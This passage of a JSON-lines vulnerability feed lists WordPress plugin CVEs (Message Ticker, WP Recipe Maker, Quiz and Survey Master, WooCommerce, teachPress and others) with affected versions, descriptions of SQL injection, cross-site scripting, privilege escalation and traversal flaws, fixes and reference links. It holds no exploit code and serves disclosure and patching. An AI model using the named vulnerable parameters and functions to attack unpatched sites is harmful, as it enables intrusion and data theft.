]}]"}
{"CVE_ID":"CVE-2023-5433","slug":"message-ticker","versionImpact":"9.2","versionEndExcluding":"9.3","description":"The Message ticker plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 9.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 9.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/message-ticker\\\/trunk\\\/message-ticker.php?rev=2827131#L142\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/message-ticker\\\/trunk\\\/message-ticker.php?rev=2827131#L142\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0b1fa88-2fc6-41af-bd39-12af92dc6533?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0b1fa88-2fc6-41af-bd39-12af92dc6533?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985499\\\/message-ticker#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985499\\\/message-ticker#file1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10679","slug":"quiz-master-next","versionImpact":"9.2.0","versionEndExcluding":"9.2.1","description":"The Quiz and Survey Master (QSM)  WordPress plugin before 9.2.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 9.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/001391eb-f181-441d-b777-d9ce098ba143\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/001391eb-f181-441d-b777-d9ce098ba143\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3058","slug":"xelion-webchat","versionImpact":"9.1.0","versionEndExcluding":"9.2.0","description":"The Xelion Webchat plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the xwc_save_settings() function in all versions up to, and including, 9.1.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"Update to version 9.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xelion-webchat\\\/trunk\\\/\\\/includes\\\/class-xelion-webchat-ajax-admin.php#L119\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xelion-webchat\\\/trunk\\\/\\\/includes\\\/class-xelion-webchat-ajax-admin.php#L119\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/250202d5-3a0d-494c-8386-1f4cd015ad7e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/250202d5-3a0d-494c-8386-1f4cd015ad7e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5466","slug":"wp-anything-slider","versionImpact":"9.1","versionEndExcluding":"9.2","description":"The Wp anything slider plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 9.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/535e754e-f851-4809-a148-d9ba808b9d8a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/535e754e-f851-4809-a148-d9ba808b9d8a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-anything-slider\\\/trunk\\\/wp-anything-slider.php?rev=2827063#L122\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-anything-slider\\\/trunk\\\/wp-anything-slider.php?rev=2827063#L122\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-anything-slider\\\/trunk\\\/wp-anything-slider.php?rev=2827063#L136\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-anything-slider\\\/trunk\\\/wp-anything-slider.php?rev=2827063#L136\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985513\\\/wp-anything-slider#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985513\\\/wp-anything-slider#file2\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4712","slug":"wp-cerber","versionImpact":"9.1","versionEndExcluding":"9.2","description":"The WP Cerber Security plugin for WordPress is vulnerable to stored cross-site scripting via the log parameter when logging in to the site in versions up to, and including, 9.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6cd9cbba-10b0-4fb0-ad49-4593a307a615?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6cd9cbba-10b0-4fb0-ad49-4593a307a615?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-cerber\\\/trunk\\\/admin\\\/cerber-dashboard.php?rev=2721561#L1338\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-cerber\\\/trunk\\\/admin\\\/cerber-dashboard.php?rev=2721561#L1338\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13814","slug":"global-gallery","versionImpact":"9.1.5","versionEndExcluding":"9.1.6","description":"The The Global Gallery - WordPress Responsive Gallery plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 9.1.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes.","recommendation":"Update to version 9.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/global-gallery-wordpress-responsive-gallery\\\/3310108\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/global-gallery-wordpress-responsive-gallery\\\/3310108\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/lcweb.it\\\/global-gallery-wordpress-photogallery-plugin\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/lcweb.it\\\/global-gallery-wordpress-photogallery-plugin\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b5ba815-ce92-4d7b-aa80-29d6fddd7f63?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b5ba815-ce92-4d7b-aa80-29d6fddd7f63?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8758","slug":"quiz-master-next","versionImpact":"9.1.2","versionEndExcluding":"9.1.3","description":"The Quiz and Survey Master (QSM)  WordPress plugin before 9.1.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 9.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d74ecae2-3a1e-4fc7-9dd3-04cef631ecd9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d74ecae2-3a1e-4fc7-9dd3-04cef631ecd9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0383","slug":"wp-recipe-maker","versionImpact":"9.1.0","versionEndExcluding":"9.1.1","description":"The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's [wprm-recipe-instructions] and [wprm-recipe-ingredients] shortcodes in all versions up to, and including, 9.1.0 due to insufficient restrictions on the 'group_tag' attribute . This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 9.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/104b3c01-4623-43cb-aed4-16e3be62e1f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/104b3c01-4623-43cb-aed4-16e3be62e1f9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/recipe\\\/class-wprm-sc-instructions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/recipe\\\/class-wprm-sc-instructions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/recipe\\\/class-wprm-sc-ingredients.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/recipe\\\/class-wprm-sc-ingredients.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0381","slug":"wp-recipe-maker","versionImpact":"9.1.0","versionEndExcluding":"9.1.1","description":"The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the use of the 'tag' attribute in the wprm-recipe-name, wprm-recipe-date, and wprm-recipe-counter shortcodes in all versions up to, and including, 9.1.0. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 9.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7c949f0-fcd1-4984-95a2-b19fb72f04bb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7c949f0-fcd1-4984-95a2-b19fb72f04bb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/recipe\\\/class-wprm-sc-name.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/recipe\\\/class-wprm-sc-name.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/recipe\\\/class-wprm-sc-counter.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/recipe\\\/class-wprm-sc-counter.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/recipe\\\/class-wprm-sc-date.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/recipe\\\/class-wprm-sc-date.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6970","slug":"wp-recipe-maker","versionImpact":"9.1.0","versionEndExcluding":"9.1.1","description":"The WP Recipe Maker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018Referer' header in all versions up to, and including, 9.1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 9.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20842e95-4b91-4138-9e32-7c090724bf64?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20842e95-4b91-4138-9e32-7c090724bf64?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/templates\\\/public\\\/print.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/templates\\\/public\\\/print.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6958","slug":"wp-recipe-maker","versionImpact":"9.1.0","versionEndExcluding":"9.1.1","description":"The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 9.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 9.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec201702-8c8c-4049-b647-422d18001b7f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec201702-8c8c-4049-b647-422d18001b7f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/general\\\/class-wprm-sc-text.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/general\\\/class-wprm-sc-text.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0384","slug":"wp-recipe-maker","versionImpact":"9.1.0","versionEndExcluding":"9.1.1","description":"The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Recipe Notes in all versions up to, and including, 9.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 9.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/749c5d09-1e9a-4aa1-b7c2-6f9d24f3a09b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/749c5d09-1e9a-4aa1-b7c2-6f9d24f3a09b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3019769%40wp-recipe-maker&new=3019769%40wp-recipe-maker&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3019769%40wp-recipe-maker&new=3019769%40wp-recipe-maker&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0382","slug":"wp-recipe-maker","versionImpact":"9.1.0","versionEndExcluding":"9.1.1","description":"The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 9.1.0 due to unrestricted use of the 'header_tag' attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 9.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f463ed1-06ad-430f-b450-1a73dc54f8a7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f463ed1-06ad-430f-b450-1a73dc54f8a7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/class-wprm-shortcode-helper.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/class-wprm-shortcode-helper.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0380","slug":"wp-recipe-maker","versionImpact":"9.1.0","versionEndExcluding":"9.1.1","description":"The WP Recipe Maker plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 9.1.0 via the 'icon' attribute used in Shortcodes. This makes it possible for authenticated attackers, with contributor-level access and above, to include the contents of SVG files on the server, which can be leveraged for Cross-Site Scripting.","recommendation":"Update to version 9.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/457c4e56-c2a0-451f-a4a6-e7fb7bf7b0e0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/457c4e56-c2a0-451f-a4a6-e7fb7bf7b0e0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/class-wprm-icon.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/class-wprm-icon.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0255","slug":"wp-recipe-maker","versionImpact":"9.1.0","versionEndExcluding":"9.1.1","description":"The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wprm-recipe-text-share' shortcode in all versions up to, and including, 9.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 9.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53a51408-e5d8-4727-9dec-8321c062c31e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53a51408-e5d8-4727-9dec-8321c062c31e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/class-wprm-icon.php#L52\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/class-wprm-icon.php#L52\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/class-wprm-icon.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/class-wprm-icon.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6879","slug":"quiz-master-next","versionImpact":"9.1.0","versionEndExcluding":"9.1.1","description":"The Quiz and Survey Master (QSM)  WordPress plugin before 9.1.1 fails to validate and escape certain Quiz fields before displaying them on a page or post where the Quiz is embedded, which could allows contributor and above roles to perform Stored Cross-Site Scripting (XSS) attacks.","recommendation":"Update to version 9.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4da0b318-03e7-409d-9b02-f108e4232c87\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4da0b318-03e7-409d-9b02-f108e4232c87\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9944","slug":"woocommerce","versionImpact":"9.0.2","versionEndExcluding":"9.1.0","description":"The WooCommerce plugin for WordPress is vulnerable to HTML Injection in all versions up to, and including, 9.0.2. This is due to the plugin not properly neutralizing HTML elements from submitted order forms. This makes it possible for unauthenticated attackers to inject arbitrary HTML that will render when the administrator views order form submissions.","recommendation":"Update to version 9.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5dfe2a5-612f-4e6c-a639-4afcff2ffa4c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5dfe2a5-612f-4e6c-a639-4afcff2ffa4c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/woocommerce\\\/woocommerce\\\/pull\\\/49370\",\"name\":\"https:\\\/\\\/github.com\\\/woocommerce\\\/woocommerce\\\/pull\\\/49370\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/raw.githubusercontent.com\\\/woocommerce\\\/woocommerce\\\/trunk\\\/changelog.txt\",\"name\":\"https:\\\/\\\/raw.githubusercontent.com\\\/woocommerce\\\/woocommerce\\\/trunk\\\/changelog.txt\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3115837%40woocommerce%2Ftrunk&old=3106873%40woocommerce%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3115837%40woocommerce%2Ftrunk&old=3106873%40woocommerce%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6390","slug":"quiz-master-next","versionImpact":"9.0.5","versionEndExcluding":"9.1.0","description":"The Quiz and Survey Master (QSM)  WordPress plugin before 9.1.0 does not properly sanitise and escape some of its Quizz settings, which could allow high privilege users such as contributor to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 9.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/00586687-33c7-4d84-b606-0478b1063d24\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/00586687-33c7-4d84-b606-0478b1063d24\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5663","slug":"news-announcement-scroll","versionImpact":"9.0.0","versionEndExcluding":"9.1.0","description":"The News Announcement Scroll plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 9.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with contributor-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 9.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b29113d6-7a9a-4e10-a446-147ec146ac93?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b29113d6-7a9a-4e10-a446-147ec146ac93?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/news-announcement-scroll\\\/tags\\\/9.0.0\\\/news-announcement-scroll.php#L261\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/news-announcement-scroll\\\/tags\\\/9.0.0\\\/news-announcement-scroll.php#L261\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2987837\\\/news-announcement-scroll#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2987837\\\/news-announcement-scroll#file2\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5428","slug":"image-vertical-reel-scroll-slideshow","versionImpact":"9.0","versionEndExcluding":"9.1","description":"The Image vertical reel scroll slideshow plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 9.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01d31d8a-4459-488a-9cbe-92761faa58b4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01d31d8a-4459-488a-9cbe-92761faa58b4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-vertical-reel-scroll-slideshow\\\/trunk\\\/image-vertical-reel-scroll-slideshow.php?rev=2827122#L273\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-vertical-reel-scroll-slideshow\\\/trunk\\\/image-vertical-reel-scroll-slideshow.php?rev=2827122#L273\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985333\\\/image-vertical-reel-scroll-slideshow#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985333\\\/image-vertical-reel-scroll-slideshow#file1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1321","slug":"teachpress","versionImpact":"9.0.7","versionEndExcluding":"9.0.8","description":"The teachPress plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the 'tpsearch' shortcode in all versions up to, and including, 9.0.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 9.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3246754%40teachpress&new=3246754%40teachpress&sfp_email=&sfph_mail=#file6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3246754%40teachpress&new=3246754%40teachpress&sfp_email=&sfph_mail=#file6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb453fe3-ba89-437c-b3fb-9ec207eaa9f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb453fe3-ba89-437c-b3fb-9ec207eaa9f0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6025","slug":"quiz-master-next","versionImpact":"9.0.4","versionEndExcluding":"9.0.5","description":"The Quiz and Survey Master (QSM)  WordPress plugin before 9.0.5 does not sanitise and escape some of its Quiz settings, which could allow contributors and higher to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 9.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/15abc7dd-95b1-4dad-ba25-eb65105d3925\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/15abc7dd-95b1-4dad-ba25-eb65105d3925\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
